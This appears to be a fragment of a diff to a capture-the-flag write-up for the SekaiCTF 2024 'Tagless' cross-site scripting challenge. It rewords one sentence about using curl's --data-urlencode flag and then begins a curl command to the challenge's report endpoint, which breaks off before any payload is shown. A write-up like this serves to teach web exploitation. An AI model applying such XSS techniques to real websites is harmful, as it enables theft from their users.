SekaiCTF 2024 Tagless Writeup

 “By your powers combined, I am Captain XSS!”

-Since we don’t like messing with URL escapes too much, we let Curl handle the task for us using the --data-urlencode flag:
+I don’t like messing with URL escapes too much.
+I let Curl handle encoding the script using the --data-urlencode flag:

 curl https://tagless-XXXXXXXXXXXX.chals.sekai.team/report \